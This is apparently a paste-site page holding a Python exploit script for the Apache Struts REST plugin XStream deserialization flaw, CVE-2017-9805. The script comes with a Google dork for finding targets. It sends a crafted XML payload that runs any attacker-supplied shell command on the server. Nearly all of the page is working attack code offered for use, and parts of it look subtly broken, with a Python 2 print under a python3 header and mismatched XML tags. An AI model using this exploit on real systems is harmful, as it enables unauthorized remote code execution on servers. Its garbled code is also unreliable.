Apache Struts 2.5 < 2.5.12 - REST Plugin XS

From Warflop, 2 Months ago, written in Python, viewed 88 times.
URL https://secploit.com/view/c730a7e5 Embed
Download Paste or View Raw
  1. # Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
  2. # Google Dork: filetype:action
  3. # Date: 06/09/2017
  4. # Exploit Author: Warflop
  5. # Vendor Homepage: https://struts.apache.org/
  6. # Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
  7. # Version: Struts 2.5 – Struts 2.5.12
  8. # Tested on: Struts 2.5.10
  9. # CVE : 2017-9805
  10.  
  11. #!/usr/bin/env python3
  12. # coding=utf-8
  13. # *****************************************************
  14. # Struts CVE-2017-9805 Exploit
  15. # Warflop (http://securityattack.com.br/)
  16. # Greetz: Pimps & G4mbl3r
  17. # *****************************************************
  18. import requests
  19. import sys
  20.  
  21. def exploration(command):
  22.  
  23.  exploit = '''
  24.    <map>
  25.    <entry>
  26.    <jdk>
  27.    <flags>0</flags>
  28.    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
  29.    <dataHandler>
  30.    <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
  31.    <is class="javax.crypto.CipherInputStream">
  32.    <cipher class="javax.crypto.NullCipher">
  33.    <initialized>false</initialized>
  34.    <opmode>0</opmode>
  35.    <serviceIterator class="javax.imageio.spi.FilterIterator">
  36.    <iter class="javax.imageio.spi.FilterIterator">
  37.    <iter class="java.util.Collections$EmptyIterator">
  38.    <next class="java.lang.ProcessBuilder">
  39.    <command>
  40.    <string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
  41.    </command>
  42.    <redirectErrorStream>false</redirectErrorStream>
  43.    </next>
  44.    </iter>
  45.    <filter class="javax.imageio.ImageIO$ContainsFilter">
  46.    <method>
  47.    <class>java.lang.ProcessBuilder</class>
  48.    <name>start</name>
  49.    <parameter>
  50.    </method>
  51.    <name>foo</name>
  52.    </filter>
  53.    <next class="string">foo</next>
  54.    </serviceIterator>
  55.    <lock>
  56.    </cipher>
  57.    &lt;input class="java.lang.ProcessBuilder$NullInputStream"/&gt;
  58.    <ibuffer>
  59.    <done>false</done>
  60.    <ostart>0</ostart>
  61.    <ofinish>0</ofinish>
  62.    <closed>false</closed>
  63.    </is>
  64.    <consumed>false</consumed>
  65.    </dataSource>
  66.    <transferFlavors>
  67.    </dataHandler>
  68.    <dataLen>0</dataLen>
  69.    </value>
  70.    </jdk>
  71.    <jdk reference="../jdk.nashorn.internal.objects.NativeString">
  72.    </entry>
  73.    <entry>
  74.    <jdk reference="../../entry/jdk.nashorn.internal.objects.NativeString">
  75.    <jdk reference="../../entry/jdk.nashorn.internal.objects.NativeString">
  76.    </entry>
  77.    </map>
  78.    '''
  79.  
  80.  
  81.  url = sys.argv[1]
  82.  
  83.  headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
  84.    'Content-Type': 'application/xml'}
  85.  
  86.  request = requests.post(url, data=exploit, headers=headers)
  87.  print request.text
  88.  
  89. if len(sys.argv) &lt; 3:
  90.  print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
  91.  print ('[*] Warflop - http://securityattack.com.br')
  92.  print ('[*] Greatz: Pimps & G4mbl3r')
  93.  print ('[*] Use: python struts2.py URL COMMAND')
  94.  print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
  95.  exit(0)
  96. else:
  97.  exploration(sys.argv[2])

Reply to "Apache Struts 2.5 &lt; 2.5.12 - REST Plugin XS"

Here you can reply to the paste above